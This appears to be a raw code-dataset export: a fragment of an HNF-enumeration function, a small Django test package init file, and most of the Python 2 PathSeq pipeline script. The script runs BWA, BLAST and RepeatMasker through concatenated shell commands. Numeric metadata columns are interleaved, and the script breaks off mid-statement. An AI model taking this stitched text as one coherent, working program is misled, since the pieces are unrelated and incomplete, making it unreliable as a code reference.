if (2*f)%a == 0:
for e in range(f):
#alpha 2
if (2*e)%a == 0:
for b in range(c):
b21 = 2 * e - (2 * b * e / float(a))
b31 = 2 * f - (2 * b * f / float(a))
if b21%c == 0 and b31%c == 0:
for d in range(f):
if (2*d)%a == 0:
b11 = -2*a+2*b+2*d-(2*b*d/float(a))
if b11%c == 0:
g21 = ((-2*d*e)/float(a)) - ((e * (2*e-(2*b*e/a))/float(c)))
if g21%f == 0:
g11 = 2*d - ((2*d*d)/float(a))-((b11 * e) / float(c))
if g11%f == 0:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
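# Example usage (hypothetical; requires opf_python's get_HNF_diagonals on
# the import path):
#   >>> sm_33(4)  # symmetry-preserving HNFs with determinant 4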
| 24.415541
| 100
| 0.449287
| 1,023
| 7,227
| 3.128055
| 0.082111
| 0.010625
| 0.091875
| 0.109375
| 0.897813
| 0.880938
| 0.854688
| 0.854688
| 0.845938
| 0.839688
| 0
| 0.107895
| 0.421613
| 7,227
| 295
| 101
| 24.498305
| 0.657656
| 0.32005
| 0
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047945
| false
| 0
| 0.047945
| 0
| 0.143836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5939a0448323bdaa277429294c56769cc6dca4ff
| 80
|
py
|
Python
|
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | 1
|
2016-05-08T11:45:54.000Z
|
2016-05-08T11:45:54.000Z
|
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
dali/gallery/tests/__init__.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
from dali.gallery.tests.models import *
from dali.gallery.tests.admin import *
| 20
| 39
| 0.7875
| 12
| 80
| 5.25
| 0.583333
| 0.253968
| 0.47619
| 0.634921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 3
| 40
| 26.666667
| 0.887324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3caf4ae0d9213cf97c80bd251d28fa96ee772835
| 54,602
|
py
|
Python
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 9
|
2018-02-04T23:45:14.000Z
|
2021-05-13T05:30:58.000Z
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 5
|
2017-07-10T12:56:19.000Z
|
2018-11-13T19:52:29.000Z
|
steps.py
|
ChandraPedamallu/PathSeq
|
2d92791713a7350ad6eb0540bf9cddad46b50049
|
[
"MIT"
] | 2
|
2017-10-16T21:30:08.000Z
|
2019-12-30T11:02:22.000Z
|
#!/usr/bin/env python
# Created: Chandra Sekhar Pedamallu, DFCI, The Broad Institute
# Email : pcs.murali@gmail.com
# Purpose: PathSeq2.0 pipeline
# Updates: Steps involved in the pipeline
# DFCI / Broad Institute@ copyright
import sys
import os
import commands
import random
import time
import shutil
import glob
start_time = time.time()
# Thresholds and assembler settings used by the pipeline steps below
premega_thres=" 0.9 0.95 "
blastn_thres=" 1E-7 "
megablast_thres=" 1E-7 "
blastx_thres=" 0.01 "
hash_length="21"
minlength_contigs="75"
# Call a Read Mapped versus unmapped
print "PATHSEQ PIPELINE RUNS\n"
print "STEPs*********************"
#Arguments
args=sys.argv
print "Step 0: Read config, premegablast, megablast, and blastn config files"
# Strip off spaces in front of and behind the lines and get file name
namefile = args[1].strip() # Read in FQ1 format
configfile = args[2].strip()
nthreads = args[3].strip()
nextconfiglist = args[4].strip()
pdir=args[5].strip()
cdir=args[6].strip()
full_file=args[7].strip()
total_split=args[8].strip()
id_step=args[9].strip()
compute=args[10].strip()
namefile_o=args[11].strip()
print configfile
# Program Settings
Institute=args[12].strip()
# PathSeq installation or unzip location
PathSeq_loc=args[13].strip()
PathSeq_java=PathSeq_loc + "/Java"
# Temporary directory Location
Tmp_dir=args[14].strip()
# Java library Location
Java=args[15].strip()
# BWA Location
Bwa_loc=args[16].strip()
# BLAST Location
Blast_loc=args[17].strip()
# Repeatmasker Location
Repeatmasker_loc=args[18].strip()
# Python Location
Python=args[19].strip()
# Loader_package
Package_loader=args[20].strip()
# Loader Location
Loader_file=args[21].strip()
# Assembler location
Assembler_loc=args[22].strip()
# Original Configfile
O_config=args[23].strip()
# Original Inputfile
O_inputfile=args[24].strip()
# Samtools Location
Samtools=args[25].strip()
mergesamjar=PathSeq_loc + "/3rdparty/MergeSamFiles.jar"
# Run the loader file
if Package_loader == "YES":
print Loader_file
loader_cmd=commands.getstatusoutput(Loader_file)
print loader_cmd
ff = open(configfile, 'r')
database = ff.readlines()
ff.close()
dbindex=0
print "Hello"
print "Statistics before config on the partition"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + "."
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
# Process each database entry from the config file with its matching tool
for no_databases1 in database:
dbindex = dbindex + 1
line = no_databases1.strip()
data_split=line.split(":")
print data_split
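    # Each config line has the form "TOOL:database_path"; dispatch on TOOL.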
if data_split[0] == "BWA":
print "BWA";
# Convert the FQ1 to Fastq
fq1_2_fastq = Java + " -classpath "
fq1_2_fastq = fq1_2_fastq + PathSeq_java
fq1_2_fastq = fq1_2_fastq + " FQone2Fastq "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + " "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + ".fastq"
print fq1_2_fastq
fq1_2_fastq_cmd=commands.getstatusoutput(fq1_2_fastq)
print fq1_2_fastq_cmd
# Run BWA alignment Step1
bwa_aln = Bwa_loc + " aln "
bwa_aln = bwa_aln + "-t "
bwa_aln = bwa_aln + nthreads
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + data_split[1]
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".fastq"
bwa_aln = bwa_aln + " > "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".aln.sai"
print bwa_aln
bwa_aln_cmd=commands.getstatusoutput(bwa_aln)
print bwa_aln_cmd
# Run BWA alignment Step2
bwa_aln = Bwa_loc + " samse "
bwa_aln = bwa_aln + data_split[1]
bwa_aln = bwa_aln + " "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".aln.sai "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + ".fastq"
bwa_aln = bwa_aln + " > "
bwa_aln = bwa_aln + namefile
bwa_aln = bwa_aln + "."
bwa_aln = bwa_aln + str(id_step)
bwa_aln = bwa_aln + "_"
bwa_aln = bwa_aln + str(dbindex)
bwa_aln = bwa_aln + ".aln.sam"
print bwa_aln
bwa_aln_cmd=commands.getstatusoutput(bwa_aln)
print bwa_aln_cmd
# Run Extract Unmapped reads
extract_unmapped = Java + " -classpath "
extract_unmapped = extract_unmapped + PathSeq_java
extract_unmapped = extract_unmapped + " BWAunmapped_June2016 "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + " "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + "."
extract_unmapped = extract_unmapped + str(id_step)
extract_unmapped = extract_unmapped + "_"
extract_unmapped = extract_unmapped + str(dbindex)
extract_unmapped = extract_unmapped + ".aln.sam "
extract_unmapped = extract_unmapped + namefile
extract_unmapped = extract_unmapped + ".tmp"
print extract_unmapped
extract_unmapped_cmd=commands.getstatusoutput(extract_unmapped)
print extract_unmapped_cmd
# Copy the unmapped reads
copy="mv "+ namefile
copy=copy + ".tmp "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
# Copy the unmapped reads
copy="cp "+ namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".unmappedbwa.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BWA Step"
stat="wc -l < "+ namefile
stat=stat + ".unmappedbwa.fq1."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + " > "
stat=stat + namefile
stat=stat + ".bwa."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "MEGABLAST":
print "MEGABLAST";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
# Megablast on reads
mega=Blast_loc + "blastn -task megablast -query "
mega=mega + namefile
mega=mega + ".fasta -db \""
mega=mega + data_split[1]
mega=mega + "\" -outfmt 5 -evalue 0.0000001 -word_size 16 -max_target_seqs 5 -dust no -num_threads "
mega=mega + nthreads
mega=mega + " -out "
mega=mega + namefile
mega=mega + ".mega.out"
print mega
mega_cmd=commands.getstatusoutput(mega)
print mega_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".mega.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".mega.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".mega.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".mega.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
        # Sorting the file
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".mega.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".mega.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".mega.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + megablast_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedmega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedmega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp "+ namefile
copy=copy + ".unmappedmega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after Megablast Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".mega."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "BLASTN":
print "BLASTN";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
blastn=Blast_loc + "blastn -task blastn -query "
blastn=blastn + namefile
blastn=blastn + ".fasta -db \""
blastn=blastn + data_split[1]
blastn=blastn + "\" -outfmt 5 -evalue 0.0000001 -reward 1 -penalty -3 -gapopen 5 -gapextend 2 -dust no -max_target_seqs 5 -num_threads "
blastn=blastn + nthreads
blastn=blastn + " -out "
blastn=blastn + namefile
blastn=blastn + ".blastn.out"
print blastn
blastn_cmd=commands.getstatusoutput(blastn)
print blastn_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml +PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".blastn.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".blastn.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".blastn.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".blastn.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".blastn.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".blastn.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".blastn.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastn_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads back to the original file for the next database round
copy="cp "+ namefile
copy=copy + ".unmappedmega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BLASTN Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".blastn."
stat=stat + str(id_step)
stat=stat + str("_")
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "REPEATMASKER":
print "REPEATMASKER";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta_RepeatMasker "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
# Running Repeatmasker
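# -pa sets the number of parallel RepeatMasker jobs, -no_is skips the bacterial
# insertion-element check, and -species vertebrates selects the repeat library.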
repmask=Repeatmasker_loc + "RepeatMasker"
repmask=repmask +" -no_is -pa "
repmask=repmask + nthreads
repmask=repmask + " -species vertebrates "
repmask=repmask + namefile
repmask=repmask + ".fasta"
print repmask
repmask_cmd=commands.getstatusoutput(repmask)
print repmask_cmd
# Find repeatmasker file
repfile=namefile + ".fasta.masked"
print repfile
repfile_cmd=os.path.exists(repfile)
print repfile_cmd
if repfile_cmd: # Masked file is present
# Convert the masked output back with RepeatMaskerRead and
# drop sequences with too many N's
repread=Java + " -classpath "
repread=repread + PathSeq_java
repread=repread + " RepeatMaskerRead "
repread=repread + namefile
repread=repread + ".fasta.masked"
repread=repread + " "
repread=repread + namefile
repread=repread + " "
repread=repread + namefile
repread=repread + ".new.fq1"
repread=repread + " 2"
print repread
repread_cmd=commands.getstatusoutput(repread)
print repread_cmd
copy="cp " + namefile
copy=copy + ".new.fq1 "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
else: # no masking present
print "Nothing to be done"
copy="cp "+ namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".afterrep.fq1"
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
copy="cp " + namefile
copy=copy + " "
copy=copy + namefile
copy=copy + ".unmappedrepeatmasker.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after REPEATMASKER Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".repeatmasker."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "PREMEGABLAST":
print "PREMEGABLAST";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
#Pre-Megablast on reads
mega=Blast_loc + "blastn -task megablast -query "
mega=mega + namefile
mega=mega + ".fasta -db \""
mega=mega + data_split[1]
mega=mega + "\" -outfmt 5 -evalue 0.0000001 -word_size 16 -max_target_seqs 5 -dust no -num_threads "
mega=mega + nthreads
mega=mega + " -out "
mega=mega + namefile
mega=mega + ".premega.out"
print mega
mega_cmd=commands.getstatusoutput(mega)
print mega_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".premega.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".premega.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java + " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".premega.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".premega.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".premega.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".premega.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_Adapterblast "
unmap=unmap + namefile
unmap=unmap + ".premega.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + premega_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedpremega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedpremega.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads back to the original file for the next database round
copy="cp "+ namefile
copy=copy + ".unmappedpremega.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after PREMEGABLAST Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".premega."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "BLASTX":
print "BLASTX";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
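# blastx translates the nucleotide reads in all six frames and searches a protein
# database; note the permissive -evalue 1 compared with the nucleotide steps.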
blastx=Blast_loc + "blastx -query "
blastx=blastx + namefile
blastx=blastx + ".fasta -db \""
blastx=blastx + data_split[1]
blastx=blastx + "\" -outfmt 5 -evalue 1 -gapopen 11 -gapextend 1 -max_target_seqs 5 -num_threads "
blastx=blastx + nthreads
blastx=blastx + " -out "
blastx=blastx + namefile
blastx=blastx + ".blastx.out"
print blastx
blastx_cmd=commands.getstatusoutput(blastx)
print blastx_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".blastx.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".blastx.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".blastx.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".blastx.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".blastx.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".blastx.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".blastx.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads back to the original file for the next database round
copy="cp " + namefile
copy=copy + ".unmappedblastx.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after BLASTX Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".blastx."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "TBLASTX":
print "TBLASTX";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
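# tblastx translates both the reads and the nucleotide database in all six frames,
# the most sensitive (and slowest) of the BLAST flavours used here.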
tblastx=Blast_loc + "tblastx -query "
tblastx=tblastx + namefile
tblastx=tblastx + ".fasta -db \""
tblastx=tblastx + data_split[1]
tblastx=tblastx + "\" -outfmt 5 -evalue 1 -max_target_seqs 5 -num_threads "
tblastx=tblastx + nthreads
tblastx=tblastx + " -out "
